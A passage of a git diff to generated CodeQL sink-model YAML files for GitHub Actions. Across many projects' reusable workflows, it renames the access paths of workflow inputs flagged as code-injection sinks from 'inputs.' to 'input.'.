"generated"] - - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "inputs.release_tag", "code-injection", "generated"] \ No newline at end of file + - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] + - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 23bd3adc5a40..2128369a7a95 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.package_name_prefix", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.install", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.llvm_force_enable_stats", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.llvm_enable_assertions", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.build_shared_libs", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_build_type", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_cxx_compiler", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_c_compiler", "code-injection", "generated"] \ No newline at end of file + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.install", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.llvm_force_enable_stats", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.llvm_enable_assertions", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.build_shared_libs", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_build_type", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_cxx_compiler", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_c_compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index 77c7570ec0e5..57791c68c0ae 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lnbits/lnbits/.github/workflows/make.yml", "*", "inputs.make", "code-injection", "generated"] \ No newline at end of file + - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 46cc50923557..2a65a351255d 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "inputs.PPA_URI", "code-injection", "generated"] \ No newline at end of file + - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 78a5584d04b4..53f6f6da728d 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.pinned_mailu_version", "code-injection", "generated"] - - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.mailu_version", "code-injection", "generated"] - - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.docker_org", "code-injection", "generated"] \ No newline at end of file + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.docker_org", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 1c3e5b565be8..8ef924313a99 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "inputs.build_type", "code-injection", "generated"] - - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file + - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] + - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index 7e8d8061fc5d..800c95ac1bfb 100644 --- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "inputs.CTEST_END", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "inputs.CTEST_START", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "inputs.xml_command", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "inputs.artifact_name", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.cmake_command", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.artifact_name", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.CTEST_CONFIGURATION_TYPE", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.DISTR", "code-injection", "generated"] \ No newline at end of file + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_START", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "input.xml_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "input.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.cmake_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.CTEST_CONFIGURATION_TYPE", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.arch", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.DISTR", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 21e3fdb8874d..7a73bee6e57a 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "inputs.branch", "code-injection", "generated"] \ No newline at end of file + - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 67e49a5716cb..08d64944bd9a 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-mahapps-version", "code-injection", "generated"] - - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-colors-version", "code-injection", "generated"] - - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-version", "code-injection", "generated"] - - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.build-configuration", "code-injection", "generated"] \ No newline at end of file + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-colors-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.build-configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index 2f30003359c4..d1097c47aeb0 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "inputs.compilers", "code-injection", "generated"] - - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "inputs.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file + - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] + - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "input.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index ed9091f37aed..8d7fb64ad3ac 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "inputs.nightly", "code-injection", "generated"] \ No newline at end of file + - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index d940c6a98b03..d7790e533c94 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.name", "code-injection", "generated"] - - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.drivername", "code-injection", "generated"] - - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.datasource", "code-injection", "generated"] - - ["mattermost/mattermost/.github/workflows/mmctl-test-template.yml", "*", "inputs.datasource", "code-injection", "generated"] - - ["mattermost/mattermost/.github/workflows/esrupgrade-common.yml", "*", "inputs.db-dump-url", "code-injection", "generated"] \ No newline at end of file + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.drivername", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/mmctl-test-template.yml", "*", "input.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/esrupgrade-common.yml", "*", "input.db-dump-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index 57b56667fbe9..093ed8bcfd16 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 4ffee539cd43..0ce99bc5fa9e 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml @@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.adapter_version", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.sm_version", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources_namespaces", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources_types", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.adapter_name", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.patternfile_name", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.service_url", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.deployment_url", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.provider", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adapters.yaml", "*", "inputs.adapter_version", "code-injection", "generated"] \ No newline at end of file + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.sm_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources_namespaces", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources_types", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.patternfile_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.service_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.deployment_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.provider", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adapters.yaml", "*", "input.adapter_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index bfe525b2c0e2..2767dfbec767 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "inputs.board", "code-injection", "generated"] - - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "inputs.board", "code-injection", "generated"] - - ["meshtastic/firmware/.github/workflows/build_esp32_s3.yml", "*", "inputs.board", "code-injection", "generated"] - - ["meshtastic/firmware/.github/workflows/build_esp32_c3.yml", "*", "inputs.board", "code-injection", "generated"] - - ["meshtastic/firmware/.github/workflows/build_esp32.yml", "*", "inputs.board", "code-injection", "generated"] \ No newline at end of file + - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_s3.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_c3.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32.yml", "*", "input.board", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index 647bd0ae1939..2c5679329c13 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microcks/microcks/.github/workflows/package-native.yml", "*", "inputs.image-tag", "code-injection", "generated"] \ No newline at end of file + - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index b09fcb7f1026..b3e26a1cf137 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "inputs.success", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index f83101f511c6..963b64673a96 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "inputs.BACKEND_HOST", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "inputs.ARTIFACT_NAME", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-memorypipeline.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "inputs.ARTIFACT_NAME", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.ARTIFACT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-memorypipeline.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "input.ARTIFACT_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index 7a60c93516de..fcf55466a9e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -3,16 +3,16 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.tls", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.config", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.sanitize", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.plat", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.static", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.tls", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.config", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.sanitize", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.codecheck", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.systemcrypto", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.plat", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.plat", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.static", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.codecheck", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.systemcrypto", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.plat", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index 14d7e741dac1..979bd414141d 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "inputs.platformName", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index bb0e3a6a2b6b..55d810d29b53 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "inputs.patch", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index aa8f4e6b5186..19350db868c1 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.extraRunWindowsArgs", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.platform", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.extraInitWindowsArgs", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.reactNativeWindowsVersion", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.sampleName", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.extraRunWindowsArgs", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.platform", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.sampleName", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraInitWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.reactNativeWindowsVersion", "code-injection", "generated"] + - 